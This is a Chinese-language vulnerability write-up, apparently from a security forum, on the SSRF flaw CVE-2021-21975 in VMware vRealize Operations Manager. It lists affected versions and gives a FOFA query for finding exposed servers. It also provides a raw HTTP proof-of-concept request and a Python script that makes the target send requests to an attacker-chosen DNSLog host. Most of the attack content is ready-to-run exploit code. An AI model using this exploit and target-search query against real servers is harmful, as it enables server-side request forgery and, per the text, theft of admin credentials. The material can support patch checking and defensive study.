# VMware vRealize Operations Manager API SSRF漏洞 (CVE-2021-21975)
攻击者通过访问vRealize Operations Manager API传递特定的参数到服务器端进行请求伪造攻击,从而窃取管理凭据,获得一些功能的控制权限。
OVA下载:https://my.vmware.com/group/vmware/patch#search
FOFA:
“`
app=”vmware-vRealize-Operations-Manager”
“`
影响版本:
* vRealize Operations Manager 8.3.0
* vRealize Operations Manager 8.2.0
* vRealize Operations Manager 8.1.1
* vRealize Operations Manager 8.1.0
* vRealize Operations Manager 8.0.1
* vRealize Operations Manager 8.0.0
* vRealize Operations Manager 7.5.0
**PoC:**
“`
POST /casa/nodes/thumbprints HTTP/1.1
Host:target
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
[“127.0.0.1:443/ui/”]
“`
nuclei poc:https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-21975.yaml
poc.py:
“`py
# CVE-2021-21975
# fofa:title=“vRealize Operations Manager”
import requests
import urllib3
urllib3.disable_warnings()
def title():
print(“[————————————————————-]”)
print(“[——– VMware vRealize Operations Manager SSRF漏洞 ———]”)
print(“[——– CVE-2021-21975 ———-]”)
print(“[——– use:python3 CVE-2021-21975 ————]”)
print(“[——– Author:Henry4E36 ————]”)
print(“[————————————————————-]”)
def target_url(url,dnslog):
target_url = url + “/casa/nodes/thumbprints”
headers = {
“User-Agent” : “Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:86.0) Gecko/20100101 Firefox/86.0”,
“Content-Type” : “application/json;charset=UTF-8”
}
data = f'[“{dnslog}”]’
try:
res = requests.post(url=target_url,headers=headers,data=data,verify=False,timeout=5)
if res.status_code == 200:
print(f”[!] \033[31m目标系统: {url} 可能存在SSRF漏洞,请检查DNSLog响应!\033[0m”)
print(f”[0] 响应为:{res.text}”)
else:
print(f”[0] 目标系统: {url} 不存在SSRF漏洞”)
except Exception as e:
print(“[!] 目标系统出现意外错误!\n”,e)
if __name__ == “__main__”:
title()
url = str(input(“[-] 请输入需要检测的URL:\n”))
dnslog = str(input(“[-] 请输入DNSlog:\n”))
target_url(url,dnslog)
“`
ref:
* https://www.vmware.com/security/advisories/VMSA-2021-0004.html
* https://forum.ywhack.com/thread-115338-1-7.html
请登录后查看评论内容